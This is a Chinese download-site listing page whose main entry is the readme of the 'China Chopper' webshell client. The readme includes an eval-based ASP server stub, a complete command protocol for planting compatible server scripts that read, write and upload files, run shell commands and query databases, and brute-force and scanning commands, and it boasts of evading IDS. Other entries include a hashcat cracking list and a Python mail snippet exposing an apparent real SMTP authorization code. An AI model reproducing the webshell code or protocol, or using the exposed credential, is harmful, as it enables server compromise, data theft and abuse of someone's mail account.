以下算法的密码都能破解MD4MD5HalfMD5SHA1SHA2-224SHA2-256SHA2-384SHA2-512SHA3-224SHA3-256SHA3-384SHA3-512Keccak-224Keccak-256Keccak-384Keccak-512BLAKE2b-512SipHashRIPEMD-160WhirlpoolGOSTR34.11-94GOSTR34.11-2012(Streebog)256-bitGOSTR34.11-2012(Streebog)512-bitmd5($pass.$salt)md5($salt.$pass)md5(utf16le($pass).$salt)md5($salt.utf16le($pass))md5($salt.$pass.$salt)md5($salt.md5($pass))md5($salt.md5($salt.$pass))md5($salt.md5($pass.$salt))md5(md5($pass))md5(md5($pass).md5($salt))md5(strtoupper(md5($pass)))md5(sha1($pass))sha1($pass.$salt)sha1($salt.$pass)sha1(utf16le($pass).$salt)sha1($salt.utf16le($pass))sha1(sha1($pass))sha1($salt.sha1($pass))sha1(md5($pass))sha1($salt.$pass.$salt)sha1(CX)sha256($pass.$salt)sha256($salt.$pass)sha256(utf16le($pass).$salt)sha256($salt.utf16le($pass))sha512($pass.$salt)sha512($salt.$pass)sha512(utf16le($pass).$salt)sha512($salt.utf16le($pass))HMAC-MD5(key=$pass)HMAC-MD5(key=$salt)HMAC-SHA1(key=$pass)HMAC-SHA1(key=$salt)HMAC-SHA256(key=$pass)HMAC-SHA256(key=$salt)HMAC-SHA512(key=$pass)HMAC-SHA512(key=$salt)DES(PT=$salt,key=$pass)3DES(PT=$salt,key=$pass)Skip32(PT=$salt,key=$pass)ChaCha20phpassscryptPBKDF2-HMAC-MD5PBKDF2-HMAC-SHA1PBKDF2-HMAC-SHA256PBKDF2-HMAC-SHA512SkypeWPA-EAPOL-PBKDF2WPA-EAPOL-PMKWPA-PMKID-PBKDF2WPA-PMKID-PMKiSCSICHAPauthentication,MD5(CHAP)IKE-PSKMD5IKE-PSKSHA1NetNTLMv1NetNTLMv1+ESSNetNTLMv2IPMI2RAKPHMAC-SHA1Kerberos5AS-REQPre-Authetype23DNSSEC(NSEC3)CRAM-MD5PostgreSQLCRAM(MD5)MySQLCRAM(SHA1)SIPdigestauthentication(MD5)Kerberos5TGS-REPetype23TACACS+JWT(JSONWebToken)SMF(SimpleMachinesForum)>v1.1phpBB3(MD5)vBulletin=v3.8.5MyBB1.2+IPB2+(InvisionPowerBoard)WBB3(WoltlabBurningBoard)Joomla=2.5.18(MD5)WordPress(MD5)PHPSDrupal7osCommercext:CommercePrestaShopDjango(SHA-1)Django(PBKDF2-SHA256)TripcodeMe
2024/12/20 20:54:48 2.66MB hashcat hashcat5.0 最新版 破解
1
Ansible开发环境要求sudoapt-getinstallgccpython3-devgitclonehttps://github.com/181192/P038-dev-env-ansiblecdP038-dev-env-ansible./setup-direnv.shdirenvallowpipinstall-rrequirements.txt安装/设置ansible-playbookmain.yaml--ask-become-pass#Withdebug(-v-vv-vvv-vvvv)ansible-playbookmain.yaml--ask-become-pass-vvvv使用标签安装:ansible-playbookmain.yaml--tags"utilities,code"--ask-bec
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分  1)要了解的  服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
  目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
  在服务端运行的代码如下:  PHP:  ASP:  ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言)  Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
  2)怎么用  在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,  保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
  要是其它都没错误,那么可能就是你把语言编码选错了。
  1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;  2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)  3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)  注意:由于服务器的安全设置,某些功能可能不能正常使用。
  3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456  3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描  蜘蛛爬行,绑定域名查询,目录爆破。
  命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒  当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动  一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器  就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分  等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30 197KB hacker
1
使用此工具可以自动整理AutomationDesk中的测试报告,采用保留最新PASS报告的方式整理,没有PASS报告则保留最新的报告
2024/9/5 15:50:02 12.39MB Dsapce Automation desk 自动化
1
********搜出来的另一个链接是假的,不要下载,浪费资源,笔者就是被坑了才决定自己研究的!!!!***********ORACLE官方并未公布过考试的分值分布,以上分布是笔者根据一些已知信息推算出的每个场景的分值分布。
对,你没看错,26789场景确实只有个位数分数,而且经过本人验证,绝对没错最多误差±1分。
笔者猜测11gocm初期的分值分布应该不是这样的,可能中间改变过分值分布,主要考虑的大概是增加通过率吧。
因为6和7、8和9场景的关联度很大,如果6没做出来,那7基本是0分;
8没做出来,9肯定是0分。
这样的话,如果6、8场景分值分配很大的话,很容易考试就不及格了。
所以大家复习时精力的重点应该放在1、3、4、5这四个大分场景。
顺带一提,11gOCM考试的及格线是60.4分。
显而易见,ORACLE没有公布场景分值分布的原因就是不想让考生直接放弃小分场景。
而且考试结果也并没有公布总分分数,只有个PASS,这应该为了让你无法推算各场景分数。
1
VS2005下编写的,在Two-Pass算法上做了一些修改,运行后可看到算法流程...............
2024/8/9 16:45:23 22KB 连通域
1
使用方法:一.空间架设1.申请空间2.配置空间3.上传程序4.修改配置文件根目录config.php网站名称,网址,数据库配置无需修改。
5.执行http://网址/install安装结束后删除install文件夹,修改admin地址6.配置淘宝授权http://open.taobao.com加入开放平台=>创建应用=>填写回调URL(在程序后台API配置获取http://网址/U/)=>创建=>应用证书(复制AppKeyAppSecret到后台API配置)=>淘宝授权=>完工7.宝贝同步,设置发货形式即可。
二.自己空间架设修改配置文件config.php///////////////////////////////////////////////////////$dbhost=SAE_MYSQL_HOST_M;//数据库ip地址$dbuser=SAE_MYSQL_USER;//数据库用户名$dbpwd=SAE_MYSQL_PASS;//数据库密码$dbname=SAE_MYSQL_DB;//数据库名$dbport=SAE_MYSQL_PORT;//数据库端口$db_prefix=”t_”;把配置修改成自己的数据库即可。
$dbhost=“localhost”;//数据库ip地址$dbuser=“root”;//数据库用户名$dbpwd=“123456″;//数据库密码$dbname=“waiwailicom”;//数据库名$dbport=3306;//数据库端口$db_prefix=”t_”;执行install即可其他和免费空间架设一样
2024/7/16 20:46:19 288KB 淘宝 自动发货 提货 源码
1
一个简单的Linux下的FTPC语言实现,参考RFC959标准,实现了FTP客户端/服务器的基本操作,比如USER(没有用户验证)、PASS、STOR、RETR、TYPE、SYST、PWD、CWD等。
2024/5/21 8:25:58 24KB Linux FTP Socket编程
1
PASS样本量计算
2024/5/9 7:20:53 46.44MB PASS 样本量计
1
简单的登录自动化用例,用于初学学习参考。
邮箱设置#第三方SMTP服务mail_host="smtp.qq.com"#设置服务器mail_user="你的发送qq号@qq.com"#用户名mail_pass="osmgfopououujaeg"#口令,需要在qq邮箱中请求#设置收件人和发件人sender='你的发送qq号@qq.com'receivers=['22222@qq.com','8888888@qq.com']#接收邮件,可设置为你的QQ邮箱或者其他邮箱
2024/3/10 4:23:27 46KB python unittest 测试自动化
1
共 30 条记录 首页 上一页 下一页 尾页
在日常工作中,钉钉打卡成了我生活中不可或缺的一部分。然而,有时候这个看似简单的任务却给我带来了不少烦恼。 每天早晚,我总是得牢记打开钉钉应用,点击"工作台",再找到"考勤打卡"进行签到。有时候因为工作忙碌,会忘记打卡,导致考勤异常,影响当月的工作评价。而且,由于我使用的是苹果手机,有时候系统更新后,钉钉的某些功能会出现异常,使得打卡变得更加麻烦。 另外,我的家人使用的是安卓手机,他们也经常抱怨钉钉打卡的繁琐。尤其是对于那些不太熟悉手机操作的长辈来说,每次打卡都是一次挑战。他们总是担心自己会操作失误,导致打卡失败。 为了解决这些烦恼,我开始思考是否可以通过编写一个全自动化脚本来实现钉钉打卡。经过一段时间的摸索和学习,我终于成功编写出了一个适用于苹果和安卓系统的钉钉打卡脚本。
2024-04-09 15:03 15KB 钉钉 钉钉打卡